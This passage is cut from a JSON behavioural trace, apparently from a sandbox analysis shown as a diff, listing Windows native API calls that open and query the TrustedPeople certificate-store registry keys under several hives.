"0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1775 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1776 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000554" + } + ], + "repeated": 0, + "id": 1777 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1778 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00565000" + }, + { + "name": "RegionSize", + "value": "0x00002000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 1779 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1780 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\TrustedPeople\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1781 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1782 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1783 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1784 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1785 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1786 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000554" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\" + } + ], + "repeated": 0, + "id": 1787 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1788 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1789 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1790 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1791 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1792 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1793 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000554" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1794 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1795 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1796 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fb900", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1797 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1798 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1799 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1800 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1801 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1802 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CRLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1803 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1804 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1805 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\TrustedPeople\\CTLs" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1806 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1807 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000558" + } + ], + "repeated": 0, + "id": 1808 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1809 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1810 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\PhysicalStores" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\PhysicalStores" + } + ], + "repeated": 0, + "id": 1811 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1812 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1813 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767fa617", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000544" + } + ], + "repeated": 0, + "id": 1814 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ab678", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 1815 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000544" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\EnterpriseCertificates\\TrustedPeople" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1816 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000558" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000544" + }, + { + "name": "ObjectAttributesName", + "value": "" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\" + } + ], + "repeated": 0, + "id": 1817 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\TrustedPeople\\Certificates" + }, + { + "name": "Class", + "value": "" + }, + { + "name": "Disposition", + "value": "2", + "pretty_value": "REG_OPENED_EXISTING_KEY" + } + ], + "repeated": 0, + "id": 1818 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 1819 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000055c" + } + ], + "repeated": 0, + "id": 1820 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcc9e", + "parentcaller": "0x756ab71d", + "category": "registry", + "api": "NtCreateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000055c" + }, + { + "name": "DesiredAccess", + "value": "0x0003001f", + "pretty_value": "KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000558" 